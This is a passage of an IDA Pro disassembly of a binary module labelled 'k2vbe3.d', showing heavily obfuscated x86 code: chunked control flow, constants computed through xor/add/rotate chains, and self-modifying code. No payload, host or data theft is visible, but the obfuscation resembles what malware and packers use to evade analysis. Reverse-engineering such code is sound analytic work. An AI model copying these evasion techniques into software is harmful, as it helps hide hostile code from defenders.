; START	OF FUNCTION CHUNK FOR sub_459FFC

loc_454690:				; CODE XREF: sub_459FFC:loc_45BCD4j
		xor	edi, 0E1BA0BA0h
		sub	edi, 4563AC74h
		add	edi, 0C51FDE2Fh
		add	edx, edi
		pop	edi
		mov	edx, [edx]
		popf
		jmp	loc_44EB26
; END OF FUNCTION CHUNK	FOR sub_459FFC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456541

loc_4546AD:				; CODE XREF: sub_456541:loc_43DDEBj
		jnb	loc_45131D
		mov	eax, [ebp+8]
		cmp	dword ptr [eax-14h], 4
		jnz	loc_44C10E
		mov	eax, [ebp+8]
		cmp	dword ptr [eax-4], 4
		jnz	loc_44C10E
		cmp	dword ptr [ebp-10h], 0
		jmp	loc_454634
; END OF FUNCTION CHUNK	FOR sub_456541
; ---------------------------------------------------------------------------

loc_4546D6:				; CODE XREF: k2vbe3.d:0043F96Cj
		push	offset loc_43C2F4
		jmp	loc_43FFB7
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_451. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441409

loc_4546E1:				; CODE XREF: sub_441409:loc_4537F8j
		jnz	loc_448250
		jge	loc_43D9DD
		adc	esi, ebp
		jmp	loc_43EE45
; END OF FUNCTION CHUNK	FOR sub_441409
; ---------------------------------------------------------------------------
		or	ecx, 0BB4A56A3h
		jmp	sub_44364F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B94B

loc_4546FF:				; CODE XREF: sub_44B94B+102F2j
		jz	sub_4593D6
		jmp	loc_44495C
; END OF FUNCTION CHUNK	FOR sub_44B94B
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_369. PRESS KEYPAD	"+" TO EXPAND]
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_329. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B94B

loc_45470C:				; CODE XREF: sub_44B94B:loc_4486A3j
		add	ebp, esi
		jmp	loc_43EF23
; END OF FUNCTION CHUNK	FOR sub_44B94B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4460FD

loc_454713:				; CODE XREF: sub_4460FD-7A19j
		adc	esi, 6C384FEBh
		xor	esi, ebp
		jmp	loc_4591D1
; END OF FUNCTION CHUNK	FOR sub_4460FD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44655E

loc_454720:				; CODE XREF: sub_44655E+Fj
		mov	eax, 637A7446h
		push	edx
		push	40D79559h
		xchg	ebp, [esp+8+var_8]
		mov	edx, ebp
		pop	ebp
		xor	edx, 0A382C790h
		add	edx, 1CEF21D9h
		jmp	loc_454AC0
; END OF FUNCTION CHUNK	FOR sub_44655E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B94B

loc_454742:				; CODE XREF: sub_44B94B+9B92j
		cmp	edx, 8B6266C7h
		jmp	loc_440E48
; END OF FUNCTION CHUNK	FOR sub_44B94B
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_99. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4582DD

loc_45474E:				; CODE XREF: sub_4582DD:loc_4549D4j
		xor	edx, 13996B57h
		sub	edx, 5ABA4977h
		xor	edx, 7409922Ah
; END OF FUNCTION CHUNK	FOR sub_4582DD
; START	OF FUNCTION CHUNK FOR sub_43FF90

loc_454760:				; CODE XREF: sub_43FF90:loc_448E91j
		call	sub_443A30
; END OF FUNCTION CHUNK	FOR sub_43FF90
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_58. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E481

loc_454766:				; CODE XREF: sub_44E481-8323j
		jmp	loc_44F36E
; END OF FUNCTION CHUNK	FOR sub_44E481
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4552BE

loc_45476B:				; CODE XREF: sub_4552BE-13E14j
		jmp	sub_45B74D
; END OF FUNCTION CHUNK	FOR sub_4552BE
; ---------------------------------------------------------------------------

loc_454770:				; CODE XREF: k2vbe3.d:00449AFAj
		jnz	loc_442125
		jmp	loc_43F8A3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442C22

loc_45477B:				; CODE XREF: sub_442C22+160EFj
		jz	loc_44E44B
; END OF FUNCTION CHUNK	FOR sub_442C22
; START	OF FUNCTION CHUNK FOR sub_455A4F

loc_454781:				; CODE XREF: sub_455A4F+17F9j
		jmp	loc_454556
; END OF FUNCTION CHUNK	FOR sub_455A4F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44AF54

loc_454786:				; CODE XREF: sub_44AF54+6j
		jmp	loc_44108B
; END OF FUNCTION CHUNK	FOR sub_44AF54
; ---------------------------------------------------------------------------
		add	ecx, ebx
		shl	eax, 19h
		xchg	eax, edi
		adc	ecx, edi
		jmp	loc_44E449
; ---------------------------------------------------------------------------

locret_454799:				; CODE XREF: k2vbe3.d:004554E7j
		retn
; ---------------------------------------------------------------------------

loc_45479A:				; CODE XREF: k2vbe3.d:0045BB01j
		jmp	loc_456F11
; ---------------------------------------------------------------------------

loc_45479F:				; CODE XREF: k2vbe3.d:0045674Dj
		jmp	loc_456F48
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450A7C

loc_4547A4:				; CODE XREF: sub_450A7C+18j
		rol	eax, 11h
		sub	eax, 7A312E53h
		xor	eax, 4ABE7E5Dh
		call	sub_4553CC
		mov	ds:dword_41E190, eax
		jmp	loc_442E7A
; END OF FUNCTION CHUNK	FOR sub_450A7C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CCD0

loc_4547C3:				; CODE XREF: sub_43CCD0:loc_4587ADj
		jnz	loc_4566EE
		jmp	loc_44A071
; END OF FUNCTION CHUNK	FOR sub_43CCD0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443E73

loc_4547CE:				; CODE XREF: sub_443E73-31A5j
		pop	esi

loc_4547CF:				; CODE XREF: k2vbe3.d:loc_4534F9j
		or	esi, 1D9076A8h
		test	esi, 10h
		jmp	loc_43D22E
; END OF FUNCTION CHUNK	FOR sub_443E73
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A323

loc_4547E0:				; CODE XREF: sub_45A323:loc_44BA00j
		push	498AA54Bh
		sbb	edi, 0DFB3B105h
		jl	loc_45666F
		jmp	loc_452438
; END OF FUNCTION CHUNK	FOR sub_45A323
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4518A6

loc_4547F6:				; CODE XREF: sub_4518A6+7j
		jnb	loc_44C04B
		mov	eax, [esp-8+arg_4]
		push	edx
		push	offset sub_4408BD
		jmp	loc_44057D
; END OF FUNCTION CHUNK	FOR sub_4518A6
; ---------------------------------------------------------------------------
		jnz	loc_43FD1E
		jmp	sub_44FD0D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_459371

loc_454815:				; CODE XREF: sub_459371:loc_44EF9Ej
		pop	edx
		xchg	ebp, [esp-4+arg_0]
		mov	eax, ebp
		pop	ebp
		mov	ds:dword_451730, edx
; END OF FUNCTION CHUNK	FOR sub_459371
; START	OF FUNCTION CHUNK FOR sub_43C82E

loc_454822:				; CODE XREF: sub_43C82E:loc_43E217j
					; sub_43C82E+11D09j
		xchg	eax, edx
		call	sub_45B20A
		jmp	loc_4593A3
; END OF FUNCTION CHUNK	FOR sub_43C82E

; =============== S U B	R O U T	I N E =======================================



sub_45482D	proc near		; DATA XREF: sub_449E5F:loc_4503F4o

; FUNCTION CHUNK AT 0043CA65 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043FA1D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00440018 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004416BC SIZE 0000001C BYTES
; FUNCTION CHUNK AT 00447C57 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004480F2 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0044D4C2 SIZE 00000022 BYTES
; FUNCTION CHUNK AT 004535EC SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00456C35 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004579F6 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045B7D4 SIZE 00000015 BYTES

		mov	[ebp-14h], eax
		cmp	dword ptr [ebp-14h], 0
		jnz	loc_454240
		jmp	loc_43FA1D
sub_45482D	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		pop	ecx
		jmp	sub_45A5D9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F2E0

loc_454845:				; CODE XREF: sub_43F2E0+6EDj
		mov	[edx], esi
		pushf
		add	ecx, edi

loc_45484A:				; CODE XREF: sub_43F2E0+6E1j
		sub	eax, 0BFDD78F2h
		or	eax, 0B4D504A2h
		jmp	loc_444837
; END OF FUNCTION CHUNK	FOR sub_43F2E0

; =============== S U B	R O U T	I N E =======================================



sub_45485B	proc near		; CODE XREF: sub_457F1C-4DCAp
					; k2vbe3.d:00457764j

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043C8BF SIZE 00000022 BYTES
; FUNCTION CHUNK AT 0044B3F5 SIZE 00000012 BYTES

		xchg	edi, [esp+0]
		pop	edi
		push	eax
		mov	eax, edx
		xchg	eax, [esp+0]
		call	sub_454E83
		jmp	loc_44B3F5
sub_45485B	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D316

loc_45486F:				; CODE XREF: sub_44D316+Dj
		push	eax
		cmp	dword ptr [ebp-14h], 6
		setz	al
		call	sub_456A5F
		jmp	loc_451C51
; END OF FUNCTION CHUNK	FOR sub_44D316
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EEC6

loc_454881:				; CODE XREF: sub_43EEC6:loc_446EF3j
		add	esi, eax
; END OF FUNCTION CHUNK	FOR sub_43EEC6
; START	OF FUNCTION CHUNK FOR sub_4479A1

loc_454883:				; CODE XREF: sub_4479A1:loc_4480C2j
		mov	[ebp+0], esi
		xchg	ebx, [esp+0]
		mov	esi, ebx
		jmp	loc_4511C9
; END OF FUNCTION CHUNK	FOR sub_4479A1

; =============== S U B	R O U T	I N E =======================================



sub_454890	proc near		; DATA XREF: k2vbe3.d:0044E8A4o
		mov	ds:dword_41E0E0, eax
		lea	eax, nullsub_519
		call	sub_443C81
sub_454890	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_44B912

loc_4548A1:				; CODE XREF: sub_44B912-69ACj
		jmp	loc_459874
; END OF FUNCTION CHUNK	FOR sub_44B912
; ---------------------------------------------------------------------------

loc_4548A6:				; CODE XREF: k2vbe3.d:00448BE2j
		xchg	esi, [edi]
		adc	ecx, 0FFEFF225h
; START	OF FUNCTION CHUNK FOR sub_447EB8

loc_4548AE:				; CODE XREF: sub_447EB8:loc_448BC4j
		or	eax, 54D0EBB0h
		sub	eax, 0BF2F340Dh
		xor	eax, 6059DE57h
		jmp	loc_440911
; END OF FUNCTION CHUNK	FOR sub_447EB8
; ---------------------------------------------------------------------------

loc_4548C5:				; CODE XREF: k2vbe3.d:0044AD98j
		jl	loc_452900
; START	OF FUNCTION CHUNK FOR sub_44C6A4

loc_4548CB:				; CODE XREF: sub_44C6A4+B5A1j
		jmp	loc_45188B
; END OF FUNCTION CHUNK	FOR sub_44C6A4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D59D

loc_4548D0:				; CODE XREF: sub_44D59D-9B78j
		jmp	loc_453A00
; END OF FUNCTION CHUNK	FOR sub_44D59D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451CF1

loc_4548D5:				; CODE XREF: sub_451CF1-15752j
		jmp	loc_450053
; END OF FUNCTION CHUNK	FOR sub_451CF1
; ---------------------------------------------------------------------------

loc_4548DA:				; CODE XREF: k2vbe3.d:00447865j
		pop	ebp
		push	0A5CBD21h
		jmp	loc_452900
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_448. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EFDA

loc_4548E6:				; CODE XREF: sub_43EFDA:loc_4490CDj
		push	21A39EE4h
		pop	eax
		add	eax, 341F41DAh
		or	eax, 0B485BC73h
		add	eax, 1FBC7419h
		jmp	loc_459A48
; END OF FUNCTION CHUNK	FOR sub_43EFDA

; =============== S U B	R O U T	I N E =======================================



sub_454903	proc near		; DATA XREF: k2vbe3.d:00456D41o

; FUNCTION CHUNK AT 0043C664 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00440EBC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00448549 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044B85B SIZE 00000005 BYTES

		push	ebx
		push	0AEFE4FF8h
		pop	ebx
		add	ebx, 0D31EAC0h
		rol	ebx, 11h
		jmp	loc_44B85B
sub_454903	endp

; ---------------------------------------------------------------------------

loc_454918:				; CODE XREF: k2vbe3.d:0044A83Bj
		pop	ecx
		mov	eax, offset dword_441770
		call	sub_445024
		cmp	ds:dword_441774, 0
		jnz	sub_4488D6
		jmp	loc_454CB7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B870

loc_454935:				; CODE XREF: sub_44B870-8D2Dj
		cmp	ecx, ebx
		jmp	loc_45147C
; END OF FUNCTION CHUNK	FOR sub_44B870
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454AD4

loc_45493C:				; CODE XREF: sub_454AD4-11A20j
					; sub_454AD4:loc_44CF48j
		call	sub_43C865
; END OF FUNCTION CHUNK	FOR sub_454AD4
; START	OF FUNCTION CHUNK FOR sub_44866A

loc_454941:				; CODE XREF: sub_44866A+Dj
		jmp	loc_4570B5
; END OF FUNCTION CHUNK	FOR sub_44866A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FB73

loc_454946:				; CODE XREF: sub_43FB73+10j
		jmp	loc_44E1FA
; END OF FUNCTION CHUNK	FOR sub_43FB73
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448343

loc_45494B:				; CODE XREF: sub_448343:loc_4526E5j
		pop	esi
; END OF FUNCTION CHUNK	FOR sub_448343
; START	OF FUNCTION CHUNK FOR sub_450F71

loc_45494C:				; CODE XREF: sub_450F71-10099j
		push	1698192Bh
		pop	eax
		sub	eax, 894AAAF0h

loc_454958:				; CODE XREF: k2vbe3.d:0045AD92j
		jmp	loc_44208E
; END OF FUNCTION CHUNK	FOR sub_450F71
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A4C1

loc_45495D:				; CODE XREF: sub_45A4C1:loc_451C4Cj
		and	eax, 0C47FD85h
		test	eax, 20000h
		jmp	loc_45BC0F
; END OF FUNCTION CHUNK	FOR sub_45A4C1

; =============== S U B	R O U T	I N E =======================================



sub_45496E	proc near		; CODE XREF: sub_441885+8EDBp
					; k2vbe3.d:0044AB43j

; FUNCTION CHUNK AT 00444A9F SIZE 00000014 BYTES
; FUNCTION CHUNK AT 004505B0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00450B57 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00451ED0 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 004559E0 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00457954 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0045AF8D SIZE 00000005 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		mov	[ecx], eax
		pop	ecx

loc_454975:				; CODE XREF: sub_44CA34+4BF2j
					; sub_44CA34+F48Fj
		xor	eax, 2BABBE9Eh
		jmp	loc_45AF8D
sub_45496E	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F42B

loc_454980:				; CODE XREF: sub_44F42B-12EB0j
		add	edx, ds:4000E9h
		sub	edx, 0CD8D4437h
		xor	edx, 0AD53AE39h
		rol	edx, 1Ah
		add	edx, 0E5A97EBDh
		call	sub_45B20A
		push	eax
		jmp	loc_44B56D
; END OF FUNCTION CHUNK	FOR sub_44F42B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442DF0

loc_4549A6:				; CODE XREF: sub_442DF0:loc_446EEEj
		push	ecx
		mov	ecx, eax
		xchg	ecx, [esp+4+var_4]
		push	offset sub_445541
		jmp	loc_44BA93
; END OF FUNCTION CHUNK	FOR sub_442DF0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A323

loc_4549B6:				; CODE XREF: sub_45A323-19A4Ej
					; sub_45A323-B247j
		add	esi, 104EBBFAh
		xchg	esi, [esp+14h+var_14]
		jmp	loc_43E3DF
; END OF FUNCTION CHUNK	FOR sub_45A323
; ---------------------------------------------------------------------------

loc_4549C4:				; CODE XREF: k2vbe3.d:loc_443D92j
		js	loc_452C3E
; START	OF FUNCTION CHUNK FOR sub_44C90E

loc_4549CA:				; CODE XREF: sub_44C90E+66BDj
		jmp	loc_44339C
; END OF FUNCTION CHUNK	FOR sub_44C90E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44809D

loc_4549CF:				; CODE XREF: sub_44809D+Cj
		jmp	loc_4418BE
; END OF FUNCTION CHUNK	FOR sub_44809D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4582DD

loc_4549D4:				; CODE XREF: sub_4582DD-10864j
		jmp	loc_45474E
; END OF FUNCTION CHUNK	FOR sub_4582DD
; ---------------------------------------------------------------------------

loc_4549D9:				; CODE XREF: k2vbe3.d:00443D2Fj
		jmp	sub_453347
; ---------------------------------------------------------------------------

loc_4549DE:				; CODE XREF: k2vbe3.d:0043D278j
		jmp	sub_43C04E
; ---------------------------------------------------------------------------
		rol	esi, 14h
		xor	edx, eax
		jmp	loc_452C36
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44309C

loc_4549ED:				; CODE XREF: sub_442999-1AD3j
					; sub_442999+Ej ...
		push	offset sub_442999
		jmp	nullsub_525
; END OF FUNCTION CHUNK	FOR sub_44309C
; ---------------------------------------------------------------------------
		push	eax
		ror	eax, 5
		mov	ds:dword_444F30, eax
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45000F

loc_454A02:				; CODE XREF: sub_45000F+1697j
		jmp	loc_4427C9
; END OF FUNCTION CHUNK	FOR sub_45000F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A9B3

loc_454A07:				; CODE XREF: sub_45A9B3-1BB89j
		jmp	loc_45321A
; END OF FUNCTION CHUNK	FOR sub_45A9B3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E0F6

loc_454A0C:				; CODE XREF: sub_44E0F6+5B78j
		rol	eax, 5
		push	ecx
		mov	ecx, eax
		xchg	ecx, [esp+4+var_4]
		jmp	loc_45999B
; END OF FUNCTION CHUNK	FOR sub_44E0F6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443EF6

loc_454A1A:				; CODE XREF: sub_443EF6+D7E2j
		jo	loc_45396F
		shr	esi, 0Dh
		jmp	loc_43F47B
; END OF FUNCTION CHUNK	FOR sub_443EF6
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_101. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4553CC

loc_454A29:				; CODE XREF: sub_4553CC-80BBj
		jmp	loc_4421B2
; END OF FUNCTION CHUNK	FOR sub_4553CC
; ---------------------------------------------------------------------------

loc_454A2E:				; CODE XREF: k2vbe3.d:00445E96j
		jmp	loc_44772F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D0D5

loc_454A33:				; CODE XREF: sub_44D0D5-ACAFj
		jmp	nullsub_166
; END OF FUNCTION CHUNK	FOR sub_44D0D5
; ---------------------------------------------------------------------------

locret_454A38:				; CODE XREF: k2vbe3.d:00451A23j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452D37

loc_454A39:				; CODE XREF: sub_452D37-11D07j
		jmp	loc_444310
; END OF FUNCTION CHUNK	FOR sub_452D37
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DA1E

loc_454A3E:				; CODE XREF: sub_43DA1E+30D2j
		jl	loc_4492AF

loc_454A44:				; CODE XREF: k2vbe3.d:0045B44Fj
		jmp	loc_457093
; END OF FUNCTION CHUNK	FOR sub_43DA1E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442DF0

loc_454A49:				; CODE XREF: sub_442DF0+4AB5j
		jmp	nullsub_170
; END OF FUNCTION CHUNK	FOR sub_442DF0
; ---------------------------------------------------------------------------
		ror	edi, 8
		xor	edi, 4F8AA6B9h
		mov	ebx, esi
		sub	ecx, esi
		pop	ebx
		jmp	loc_4492AF
; ---------------------------------------------------------------------------
		mov	ds:off_41E11C, eax
		lea	eax, sub_458951
		mov	byte ptr [eax],	0C3h
		jmp	sub_458951
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458951

loc_454A75:				; CODE XREF: sub_458951+6j
		mov	eax, [esp+8+var_8]
		jmp	loc_44FB9E
; END OF FUNCTION CHUNK	FOR sub_458951
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BDBB

loc_454A7D:				; CODE XREF: sub_44BDBB:loc_4443FCj
		rol	ebx, 10h
		or	ebx, 8835AFB5h
		add	ebx, 0AFB737B5h
		xor	eax, ebx
		jmp	loc_458D5F
; END OF FUNCTION CHUNK	FOR sub_44BDBB

; =============== S U B	R O U T	I N E =======================================



sub_454A93	proc near		; DATA XREF: sub_449372-2CB5o
		mov	[edi], eax
		pop	edi
		lea	eax, loc_457048
		call	sub_458BA9
sub_454A93	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_457D4B

loc_454AA1:				; CODE XREF: sub_457D4B-7A7Bj
		jmp	loc_4499B5
; END OF FUNCTION CHUNK	FOR sub_457D4B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E470

loc_454AA6:				; CODE XREF: sub_43E470+9647j
		jmp	loc_444B4E
; END OF FUNCTION CHUNK	FOR sub_43E470
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DB59

loc_454AAB:				; CODE XREF: sub_44DB59-742Bj
		jmp	loc_447708
; END OF FUNCTION CHUNK	FOR sub_44DB59
; ---------------------------------------------------------------------------

loc_454AB0:				; CODE XREF: k2vbe3.d:004418A1j
		jz	loc_44503A
		jmp	loc_451DB8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44091B

loc_454ABB:				; CODE XREF: sub_44091B+18j
		call	sub_4478C6
; END OF FUNCTION CHUNK	FOR sub_44091B
; START	OF FUNCTION CHUNK FOR sub_44655E

loc_454AC0:				; CODE XREF: sub_44655E+E1DFj
		jmp	loc_452C86
; END OF FUNCTION CHUNK	FOR sub_44655E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4568DA

loc_454AC5:				; CODE XREF: sub_4568DA-7B57j
		jmp	loc_446BA4
; END OF FUNCTION CHUNK	FOR sub_4568DA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446E24

loc_454ACA:				; CODE XREF: sub_446E24+46Aj
		jmp	nullsub_287
; END OF FUNCTION CHUNK	FOR sub_446E24
; ---------------------------------------------------------------------------

loc_454ACF:				; CODE XREF: k2vbe3.d:0043D566j
		mov	esi, 0D3D60465h

; =============== S U B	R O U T	I N E =======================================



sub_454AD4	proc near		; CODE XREF: sub_454E69-13B2Ep

var_8		= dword	ptr -8
arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 00440B00 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00441E23 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044211B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004430A9 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00448E51 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00449395 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0044AAF0 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0044ABCC SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0044CF48 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044D6CC SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0044DC02 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045091C SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00452381 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045493C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045AECF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045C315 SIZE 0000000C BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		xor	eax, 0D3BE6159h
		add	eax, ebp
		add	eax, 0D36D614Dh
		mov	eax, [eax]
		jmp	loc_44211B
sub_454AD4	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441BF4

loc_454AED:				; CODE XREF: sub_441BF4+Fj
		mov	[ebp-8], eax
		mov	eax, [ebp-8]
		mov	esp, ebp
		pop	ebp
		retn
; END OF FUNCTION CHUNK	FOR sub_441BF4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456541

loc_454AF7:				; CODE XREF: sub_456541:loc_445207j
		cmp	dword ptr [ebp-10h], 1
		push	offset loc_44112C
		jmp	loc_4505F3
; END OF FUNCTION CHUNK	FOR sub_456541
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447594

loc_454B05:				; CODE XREF: sub_447594+30A8j
		jl	loc_459E72

loc_454B0B:				; CODE XREF: sub_444D7B+576Aj
		jmp	loc_452965
; END OF FUNCTION CHUNK	FOR sub_447594
; ---------------------------------------------------------------------------
		cmp	esi, 181DD96Bh
		jmp	loc_44424B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44FF20

loc_454B1B:				; CODE XREF: sub_44FF20-9A23j
		xchg	ebx, [esp+0]
		jmp	sub_43C82E
; END OF FUNCTION CHUNK	FOR sub_44FF20
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454EDD

loc_454B23:				; CODE XREF: sub_454EDD+3F81j
		jbe	locret_4414DF

loc_454B29:				; CODE XREF: sub_454EDD:loc_455A44j
		mov	eax, [ebp-14h]
		mov	eax, [eax+64h]
		push	edi
		push	2579B4F2h
		pop	edi
		xor	edi, 0E6DDBB54h
		jmp	loc_4507D9
; END OF FUNCTION CHUNK	FOR sub_454EDD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4423D2

loc_454B41:				; CODE XREF: sub_4423D2+187FDj
		mov	eax, 1
		shl	eax, cl
		not	eax
		and	ebx, eax
		push	offset loc_450198
		jmp	loc_444538
; END OF FUNCTION CHUNK	FOR sub_4423D2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B477

loc_454B56:				; CODE XREF: sub_44B477:loc_455419j
		call	sub_4482F2
; END OF FUNCTION CHUNK	FOR sub_44B477
; START	OF FUNCTION CHUNK FOR sub_4529E2

loc_454B5B:				; CODE XREF: sub_4529E2-F1F7j
		add	eax, 7C2E5221h
		push	0CFD76D83h

loc_454B66:				; CODE XREF: k2vbe3.d:loc_459E6Cj
		mov	[eax], esi
		jmp	loc_43CB90
; END OF FUNCTION CHUNK	FOR sub_4529E2
; ---------------------------------------------------------------------------

loc_454B6D:				; DATA XREF: sub_44AD44:loc_44CDBFo
		or	eax, eax
		jnz	loc_43E333
		jmp	loc_4599CA
; ---------------------------------------------------------------------------

loc_454B7A:				; CODE XREF: k2vbe3.d:0044B186j
		jz	sub_44A6BD
; START	OF FUNCTION CHUNK FOR sub_44BB73

loc_454B80:				; CODE XREF: sub_44BB73:loc_4573DAj
		rol	ecx, 17h
		add	ecx, 0B9F6F33Eh
		xchg	ecx, [esp-8+arg_4]
		jmp	loc_44A0C8
; END OF FUNCTION CHUNK	FOR sub_44BB73
; ---------------------------------------------------------------------------
		cdq
		jmp	sub_456666
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D7A9

loc_454B97:				; CODE XREF: sub_43D7A9:loc_456275j
		jl	loc_44DB93
		xchg	ebx, ebp
		cdq
		jmp	loc_44BE04
; END OF FUNCTION CHUNK	FOR sub_43D7A9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4580DF

loc_454BA5:				; CODE XREF: sub_4580DF-14F34j
		jg	loc_441DB5

loc_454BAB:				; CODE XREF: sub_4580DF:loc_4521F6j
		push	offset sub_43FB73
		jmp	loc_4505EE
; END OF FUNCTION CHUNK	FOR sub_4580DF
; ---------------------------------------------------------------------------

loc_454BB5:				; CODE XREF: k2vbe3.d:0044CAF4j
		add	edx, edi
		pushf
		jmp	loc_44E416
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_361. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
